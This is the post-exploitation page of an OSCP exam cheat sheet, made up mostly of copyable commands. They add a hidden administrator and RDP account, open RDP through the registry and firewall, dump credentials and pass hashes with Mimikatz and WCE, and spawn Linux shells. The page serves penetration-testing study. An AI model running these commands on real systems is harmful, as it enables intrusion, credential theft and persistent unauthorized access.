Securable - OSCP cheat sheet
Search…
Securable - OSCP cheat sheet
Introduction
Reconnaissance & enumeration
Gaining access
Privilege escalation
Post exploitation
Lateral movement
Buffer overflow
Misc
Powered By GitBook
Post exploitation
Don't.stop.here.you.are.only.halfway.

Proof.txt

Linux
1
cat /root/proof.txt
Copied!
Windows
1
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Copied!

Windows

Add RDP user

1
net user hodor Qwerty123! /add
2
net localgroup administrators hodor /add
3
net localgroup "Remote Desktop Users" hodor /add
Copied!

Enable RDP

Via registry:
1
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Copied!
Add firewall rule:
1
netsh firewall set service remoteadmin enable
2
netsh firewall set service remotedesktop enable
Copied!

Rdesktop resolution

1
rdesktop -g 1024x768 x.x.x.x
Copied!

Passwords and hashes

Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:
1
privilege::debug
2
log sekurlsa.log
3
sekurlsa::logonpasswords
Copied!
Pass-the-hash
1
privilege::debug
2
log sekurlsa.log
3
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Copied!
Elevate token
1
privilege::debug
2
log sekurlsa.log
3
token::elevate
Copied!
Dump SAM
1
privilege::debug
2
log sekurlsa.log
3
lsadump::sam
Copied!

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.
https://www.ampliasecurity.com/research/windows-credentials-editor/
www.ampliasecurity.com
1
C:\> wce -w
Copied!

Networking

Is there a connection with another host?
1
netstat -ano
Copied!
Hosts file
1
C:\WINDOWS\System32\drivers\etc\hosts
Copied!
Firewall config
1
netsh firewall show state
2
netsh firewall show config
3
netsh dump
Copied!

PowerShell tools

Empire

GitHub - EmpireProject/Empire: Empire is a PowerShell and Python post-exploitation agent.
GitHub

PowerSploit

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework
GitHub

Linux

Spawn TTY shell

1
python -c 'import pty; pty.spawn("/bin/sh")'
Copied!
1
echo os.system('/bin/bash')
Copied!
1
/bin/bash -i
2
/bin/sh -i
Copied!
1
perl —e 'exec "/bin/sh";'
Copied!
Previous
Privilege escalation
Next
Lateral movement
Last modified 1yr ago
Copy link
Contents
Proof.txt
Windows
Add RDP user
Enable RDP
Rdesktop resolution
Passwords and hashes
Networking
PowerShell tools
Linux
Spawn TTY shell